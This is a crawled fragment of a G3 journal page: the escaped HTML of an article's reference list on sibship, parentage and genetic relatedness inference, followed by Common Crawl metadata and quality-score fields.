href=\u0022\/lookup\/external-ref?access_num=12081799\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=000176561700001\u0026amp;link_type=ISI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-newisilink cit-ref-sprinkles-webofscience\u0022\u003E\u003Cspan\u003EWeb of Science\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-46-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-46\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.46\u0022 data-doi=\u002210.1534\/genetics.166.4.1963\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EWang\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2004\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003ESibship reconstruction from genetic data with typing errors.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EGenetics\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E166\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E1963\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E1979\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DGenetics%26rft.stitle%253DGenetics%26rft.aulast%253DWang%26rft.auinit1%253DJ.%26rft.volume%253D166%26rft.issue%253D4%26rft.spage%253D1963%26rft.epage%253D1979%26rft.atitle%253DSibship%2BReconstruction%2BFrom%2BGenetic%2BData%2BWith%2BTyping%2BErrors%26rft_id%253Dinfo%253Adoi%252F10.1534%252Fgenetics.166.4.1963%26rft_id%253Dinfo%253Apmid%252F15126412%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/ijlink\/YTozOntzOjQ6InBhdGgiO3M6MTQ6Ii9sb29rdXAvaWpsaW5rIjtzOjU6InF1ZXJ5IjthOjQ6e3M6ODoibGlua1R5cGUiO3M6NDoiQUJTVCI7czoxMToiam91cm5hbENvZGUiO3M6ODoiZ2VuZXRpY3MiO3M6NToicmVzaWQiO3M6MTA6IjE2Ni80LzE5NjMiO3M6NDoiYXRvbSI7czoxODoiL2dnZy81LzkvMTgxNS5hdG9tIjt9czo4OiJmcmFnbWVudCI7czowOiIiO30=\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-ijlink\u0022\u003E\u003Cspan\u003E\u003Cspan class=\u0022cit-reflinks-abstract\u0022\u003EAbstract\u003C\/span\u003E\u003Cspan class=\u0022cit-sep cit-reflinks-variant-name-sep\u0022\u003E\/\u003C\/span\u003E\u003Cspan class=\u0022cit-reflinks-full-text\u0022\u003E\u003Cspan class=\u0022free-full-text\u0022\u003EFREE \u003C\/span\u003EFull Text\u003C\/span\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-47-2\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-47\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.47\u0022 data-doi=\u002210.1016\/j.tpb.2005.11.003\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EWang\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2006\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EInformativeness of genetic markers for pairwise relationship and relatedness inference.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003ETheor. Popul. Biol.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E70\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E300\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E321\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DTheoretical%2Bpopulation%2Bbiology%26rft.stitle%253DTheor%2BPopul%2BBiol%26rft.aulast%253DSansone%26rft.auinit1%253DE.%26rft.volume%253D70%26rft.issue%253D3%26rft.spage%253D300%26rft.epage%253D321%26rft.atitle%253DInformativeness%2Bof%2Bgenetic%2Bmarkers%2Bfor%2Bpairwise%2Brelationship%2Band%2Brelatedness%2Binference.%26rft_id%253Dinfo%253Adoi%252F10.1016%252Fj.tpb.2005.11.003%26rft_id%253Dinfo%253Apmid%252F16388833%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1016\/j.tpb.2005.11.003\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=16388833\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-48-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-48\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.48\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EWang\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2007\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003ETriadic IBD coefficients and applications to estimating pairwise relatedness.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EGenet. Res.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E89\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E135\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E153\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DGenetical%2Bresearch%26rft.stitle%253DGenet%2BRes%26rft.aulast%253DWang%26rft.auinit1%253DJ.%26rft.volume%253D89%26rft.issue%253D3%26rft.spage%253D135%26rft.epage%253D153%26rft.atitle%253DTriadic%2BIBD%2Bcoefficients%2Band%2Bapplications%2Bto%2Bestimating%2Bpairwise%2Brelatedness.%26rft_id%253Dinfo%253Apmid%252F17894908%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=17894908\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=000250908100002\u0026amp;link_type=ISI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-newisilink cit-ref-sprinkles-webofscience\u0022\u003E\u003Cspan\u003EWeb of Science\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-49-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-49\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.49\u0022 data-doi=\u002210.1111\/1755-0998.12106\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EWang\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2013\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EA simulation module in the computer program colony for sibship and parentage analysis.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EMol. Ecol. Resour.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E13\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E734\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E739\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DMol.%2BEcol.%2BResour.%26rft.volume%253D13%26rft.spage%253D734%26rft_id%253Dinfo%253Adoi%252F10.1111%252F1755-0998.12106%26rft_id%253Dinfo%253Apmid%252F23615269%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1111\/1755-0998.12106\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=23615269\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-50-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-50\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.50\u0022 data-doi=\u002210.1111\/mec.12806\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EWang\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2014\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EEstimation of migration rates from marker-based parentage analysis.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EMol. Ecol.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E23\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E3191\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E3213\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DMol.%2BEcol.%26rft.volume%253D23%26rft.spage%253D3191%26rft_id%253Dinfo%253Adoi%252F10.1111%252Fmec.12806%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1111\/mec.12806\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-51-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-51\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.51\u0022 data-doi=\u002210.1534\/genetics.108.100214\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EWang\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ESanture\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EA. W.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2009\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EParentage and sibship inference from multilocus genotype data under polygamy.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EGenetics\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E181\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E1579\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E1594\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DGenetics%26rft_id%253Dinfo%253Adoi%252F10.1534%252Fgenetics.108.100214%26rft_id%253Dinfo%253Apmid%252F19221199%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/ijlink\/YTozOntzOjQ6InBhdGgiO3M6MTQ6Ii9sb29rdXAvaWpsaW5rIjtzOjU6InF1ZXJ5IjthOjQ6e3M6ODoibGlua1R5cGUiO3M6NDoiQUJTVCI7czoxMToiam91cm5hbENvZGUiO3M6ODoiZ2VuZXRpY3MiO3M6NToicmVzaWQiO3M6MTA6IjE4MS80LzE1NzkiO3M6NDoiYXRvbSI7czoxODoiL2dnZy81LzkvMTgxNS5hdG9tIjt9czo4OiJmcmFnbWVudCI7czowOiIiO30=\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-ijlink\u0022\u003E\u003Cspan\u003E\u003Cspan class=\u0022cit-reflinks-abstract\u0022\u003EAbstract\u003C\/span\u003E\u003Cspan class=\u0022cit-sep cit-reflinks-variant-name-sep\u0022\u003E\/\u003C\/span\u003E\u003Cspan class=\u0022cit-reflinks-full-text\u0022\u003E\u003Cspan class=\u0022free-full-text\u0022\u003EFREE \u003C\/span\u003EFull Text\u003C\/span\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-52-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-52\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.52\u0022 data-doi=\u002210.1038\/nrg1960\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EWeir\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EB. S.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EAnderson\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EA. D.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EHepler\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EA. B.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2006\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EGenetic relatedness analysis: modern data and new challenges.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003ENat. Rev. Genet.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E7\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E771\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E780\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DNature%2Breviews.%2BGenetics%26rft.stitle%253DNat%2BRev%2BGenet%26rft.aulast%253DWeir%26rft.auinit1%253DB.%2BS.%26rft.volume%253D7%26rft.issue%253D10%26rft.spage%253D771%26rft.epage%253D780%26rft.atitle%253DGenetic%2Brelatedness%2Banalysis%253A%2Bmodern%2Bdata%2Band%2Bnew%2Bchallenges.%26rft_id%253Dinfo%253Adoi%252F10.1038%252Fnrg1960%26rft_id%253Dinfo%253Apmid%252F16983373%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1038\/nrg1960\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=16983373\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=000241158700013\u0026amp;link_type=ISI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-newisilink cit-ref-sprinkles-webofscience\u0022\u003E\u003Cspan\u003EWeb of Science\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003C\/div\u003E\u003Cspan class=\u0022highwire-journal-article-marker-end\u0022\u003E\u003C\/span\u003E\u003C\/div\u003E\u003Cspan id=\u0022related-urls\u0022\u003E\u003C\/span\u003E\u003C\/div\u003E\u003Ca href=\u0022https:\/\/www.g3journal.org\/content\/5\/9\/1815.abstract\u0022 class=\u0022hw-link hw-link-article-abstract\u0022 data-icon-position=\u0022\u0022 data-hide-link-title=\u00220\u0022\u003EView Abstract\u003C\/a\u003E\u003C\/div\u003E \u003C\/div\u003E\n\n \n \u003C\/div\u003E\n\u003C\/div\u003E\n \u003C\/div\u003E\n\u003C\/div\u003E\n\u003C\/div\u003E\u003Cscript type=\u0022text\/javascript\u0022 src=\u0022https:\/\/www.g3journal.org\/sites\/default\/files\/js\/js_8GIykOophmDZWQSVemuR9p9M6vwIgWI3Rnd13-Cgx2E.js\u0022\u003E\u003C\/script\u003E\n\u003C\/body\u003E\u003C\/html\u003E"}
|
{
"url": "https://www.g3journal.org/panels_ajax_tab/jnl_genetics_tab_art/node:460023/1",
"source_domain": "www.g3journal.org",
"snapshot_id": "crawl=CC-MAIN-2020-05",
"warc_metadata": {
"Content-Length": "242457",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:KZABICMRAUV7A43ETIVRHQ75KDJLWWF6",
"WARC-Concurrent-To": "<urn:uuid:6f78290a-eab8-4b03-9f55-9ed2d8ce034a>",
"WARC-Date": "2020-01-20T11:57:25Z",
"WARC-IP-Address": "104.16.148.14",
"WARC-Identified-Payload-Type": "application/json",
"WARC-Payload-Digest": "sha1:VP2M7MAPSNMD32C2AJSTSQQCETTSMNTP",
"WARC-Record-ID": "<urn:uuid:a7047f09-7724-4f3c-b062-1dd9e20f4edb>",
"WARC-Target-URI": "https://www.g3journal.org/panels_ajax_tab/jnl_genetics_tab_art/node:460023/1",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:55e30fc7-abeb-45d8-b2c6-5e340e07085d>"
},
"warc_info": "isPartOf: CC-MAIN-2020-05\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for January 2020\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-103.ec2.internal\r\nsoftware: Apache Nutch 1.16 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0
],
"line_end_idx": [
241225
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 241225,
"ccnet_original_nlines": 0,
"rps_doc_curly_bracket": 0.0007793600088916719,
"rps_doc_ldnoobw_words": 8,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.05883010849356651,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.01490319985896349,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.46821290254592896,
"rps_doc_frac_unique_words": 0.268612265586853,
"rps_doc_mean_word_length": 19.47806167602539,
"rps_doc_num_sentences": 2412,
"rps_doc_symbol_to_word_ratio": 0.002523799892514944,
"rps_doc_unigram_entropy": 6.511538982391357,
"rps_doc_word_count": 10074,
"rps_doc_frac_chars_dupe_10grams": 0.05322033166885376,
"rps_doc_frac_chars_dupe_5grams": 0.19929976761341095,
"rps_doc_frac_chars_dupe_6grams": 0.13143275678157806,
"rps_doc_frac_chars_dupe_7grams": 0.11220964044332504,
"rps_doc_frac_chars_dupe_8grams": 0.09324132651090622,
"rps_doc_frac_chars_dupe_9grams": 0.06308671087026596,
"rps_doc_frac_chars_top_2gram": 0.03375767916440964,
"rps_doc_frac_chars_top_3gram": 0.007262180093675852,
"rps_doc_frac_chars_top_4gram": 0.009010200388729572,
"rps_doc_books_importance": -24641.13671875,
"rps_doc_books_importance_length_correction": -24641.13671875,
"rps_doc_openwebtext_importance": -17735.04296875,
"rps_doc_openwebtext_importance_length_correction": -17735.04296875,
"rps_doc_wikipedia_importance": -10088.34375,
"rps_doc_wikipedia_importance_length_correction": -10088.34375
},
"fasttext": {
"dclm": 0.2706126570701599,
"english": 0.32154595851898193,
"fineweb_edu_approx": 2.967963457107544,
"eai_general_math": 0.5667739510536194,
"eai_open_web_math": 0.5216443538665771,
"eai_web_code": 0.2574542164802551
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "576.5",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Biology and Anthropology",
"level_3": "Microbiology"
}
},
"secondary": {
"code": "598.07",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Zoology",
"level_3": "Birds"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "4",
"label": "Analyze"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "2",
"label": "Academic/Research"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "1",
"label": "Leftover HTML"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "3",
"label": "Academic Writing"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
